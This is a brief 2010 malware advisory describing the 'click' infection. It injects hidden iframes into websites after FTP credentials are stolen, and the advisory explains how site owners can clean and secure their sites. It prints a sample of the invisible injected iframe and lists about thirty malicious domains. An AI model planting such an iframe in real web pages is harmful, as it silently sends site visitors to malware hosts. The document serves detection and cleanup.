Updated: April 5, 2010

The click malware places an iframe into a website's web pages. Each instance of the iframe on the website is given a unique value for the click parameter in its URL. To clean the website, the website needs to be reverted to a clean backup or the malicious code need to be removed from the web pages. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to access the website via FTP.

Current Iframe Format:

<iframe src="http://dakilfu.com/?click=1248EE5" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domains Used by the Malware: goooogleadsence.biz, openstats.info, durnosy.com, beidzan.com, maislex.net, efradin.net, saarcop.net, nipkelo.net, asfirey.net, warpiln.net, hantder.com, rabetis.net, fabujob.com, zymkasi.com, niklejo.net, erapost.net, hulmeux.net, kebsyno.com, likkiaz.net, ahbazen.net, ezadguf.net, koinzux.net, vistersearch.info, msnupdateserver.info, clodaib.com, internetcountercheck.com, odiklaf.com, marazuo.net, hostverify.net, dakilfu.net

Virus Scan Identifications:HTML:Iframe-inf, JS/IFrame.gen

Related:

Resources

• Request a Malware Review from Google
• Request a Malware Review from Yahoo
• Request a Malware Review from Bing
• Set Up a Google Malware Warning Email Alert
• Cross-Site Malware Warning
• Unobfuscate JavaScript Malware